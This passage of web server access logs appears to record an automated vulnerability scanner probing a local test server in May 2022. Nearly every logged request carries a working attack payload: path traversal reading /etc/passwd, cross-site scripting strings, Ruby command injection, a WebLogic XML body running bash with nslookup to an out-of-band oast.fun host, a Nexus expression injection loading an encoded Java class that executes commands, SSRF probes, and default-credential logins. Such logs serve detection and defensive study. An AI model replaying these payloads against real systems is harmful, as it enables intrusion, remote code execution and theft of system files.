+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=c9v8h88smpv8c1ig07h0hi1y9on1b7cfo.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ghost/preview HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /bin/bash\x0D\x0A \x0D\x0A \x0D\x0A -c\x0D\x0A \x0D\x0A \x0D\x0A nslookup c9v8h8gsmpv8c1qg07h0go9a58mdnfr36.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wls-wsat/CoordinatorPortType HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clientaccesspolicy.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/database-backups/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x22action\x22: \x22coreui_Component\x22, \x22type\x22: \x22rpc\x22, \x22tid\x22: 8, \x22data\x22: [{\x22sort\x22: [{\x22direction\x22: \x22ASC\x22, \x22property\x22: \x22name\x22}], \x22start\x22: 0, \x22filter\x22: [{\x22property\x22: \x22repositoryName\x22, \x22value\x22: \x22*\x22}, {\x22property\x22: \x22expression\x22, \x22value\x22: \x22function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \x5CndefineClass.setAccessible(true);\x5Cnx=defineClass.invoke(\x5Cn y,\x5Cn 'Exploit.Test234',\x5Cn z.getBytes('latin1'), 0,\x5Cn 3054\x5Cn);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\x5Cn\x22}, {\x22property\x22: \x22type\x22, \x22value\x22: \x22jexl\x22}], \x22limit\x22: 50, \x22page\x22: 1}], \x22method\x22: \x22previewAssets\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/extdirect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/297MTvBcoRqGUS5QdBOh64LnfXx.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy.stream?origin=http://c9v8h8gsmpv8c1qg07h0bofzqytyn3ggx.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2021/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /key.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.232","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn_logon.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.222","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/submissions HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", 